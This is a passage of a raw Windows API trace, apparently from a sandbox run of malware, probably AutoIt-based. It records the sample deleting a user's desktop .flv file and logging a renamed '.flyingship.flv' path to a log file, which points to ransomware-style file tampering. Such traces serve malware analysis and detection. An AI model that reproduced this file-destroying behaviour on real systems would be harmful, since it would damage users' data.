wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.246] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.246] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0161.246] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.246] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.246] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0161.247] FreeLibrary (hLibModule=0x75990000) returned 1 [0161.247] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.247] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.247] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.247] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv", lpFilePart=0x0) returned 0x3a [0161.249] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ed1cf80, ftCreationTime.dwHighDateTime=0x1d5e7d3, ftLastAccessTime.dwLowDateTime=0xac0935f0, ftLastAccessTime.dwHighDateTime=0x1d5dbc6, ftLastWriteTime.dwLowDateTime=0x589b640, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x16c92, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="FL0fY8Lpz-WJNvLo.flv", cAlternateFileName="FL0FY8~1.FLV")) returned 0x90af58 [0161.249] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fl0fy8lpz-wjnvlo.flv")) returned 1 [0161.253] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ed1cf80, ftCreationTime.dwHighDateTime=0x1d5e7d3, ftLastAccessTime.dwLowDateTime=0xac0935f0, ftLastAccessTime.dwHighDateTime=0x1d5dbc6, ftLastWriteTime.dwLowDateTime=0x589b640, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x16c92, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="FL0fY8Lpz-WJNvLo.flv", cAlternateFileName="FL0FY8~1.FLV")) returned 0 [0161.253] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0161.253] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.254] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0161.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0161.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0161.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0161.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0161.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0161.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0161.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0161.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0161.254] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0161.254] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0161.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0161.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0161.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0161.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0161.254] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0161.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0161.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0161.254] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0161.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0161.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0161.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0161.254] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0161.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0161.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0161.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0161.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0161.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0161.255] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0161.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0161.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0161.255] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0161.255] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.255] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0161.255] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.255] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0161.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0161.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa7d010 [0161.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0161.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0161.255] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0161.255] ReadFile (in: hFile=0x120, lpBuffer=0xa6d008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa6d008*, lpNumberOfBytesRead=0x87f43c*=0x605, lpOverlapped=0x0) returned 1 [0161.256] ReadFile (in: hFile=0x120, lpBuffer=0xa6d008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa6d008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0161.256] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x605, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.256] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0161.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa7d010 | out: hHeap=0x8a0000) returned 1 [0161.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0161.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0161.256] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flyingship.flv\r\n", cchWideChar=72, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0161.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x48) returned 0x9aa4f8 [0161.256] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flyingship.flv\r\n", cchWideChar=72, lpMultiByteStr=0x9aa4f8, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flyingship.flv\r\n", lpUsedDefaultChar=0x0) returned 72 [0161.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0161.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0161.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0161.256] WriteFile (in: hFile=0x120, lpBuffer=0x923a78*, nNumberOfBytesToWrite=0x47, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923a78*, lpNumberOfBytesWritten=0x87f43c*=0x47, lpOverlapped=0x0) returned 1 [0161.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0161.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.256] CloseHandle (hObject=0x120) returned 1 [0161.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0161.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0161.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6d008 | out: hHeap=0x8a0000) returned 1 [0161.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0161.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0161.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0161.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0161.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0161.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0161.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0161.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0161.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0161.263] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0161.263] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0161.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0161.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0161.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0161.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0161.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0161.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0161.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0161.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0161.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0161.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0161.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0161.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0161.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0161.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0161.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0161.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0161.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0161.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0161.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0161.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0161.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0161.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0161.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0161.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0161.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0161.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0161.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0161.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0161.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0161.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0161.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0161.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0161.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0161.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0161.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0161.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0161.264] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0161.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0161.264] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0161.264] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0161.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0161.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0161.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0161.264] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0161.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0161.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0161.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0161.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0161.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0161.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0161.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0161.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0161.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0161.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0161.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0161.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd528 [0161.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0161.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0161.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0161.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0161.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0161.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0161.265] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0161.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0161.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0161.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0161.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0161.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0161.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0161.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0161.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0161.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0161.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0161.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0161.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0161.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0161.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0161.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0161.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0161.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0161.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0161.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0161.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0161.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0161.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0161.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0161.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0161.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0161.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0161.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0161.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0161.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0161.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0161.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0161.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0161.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0161.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 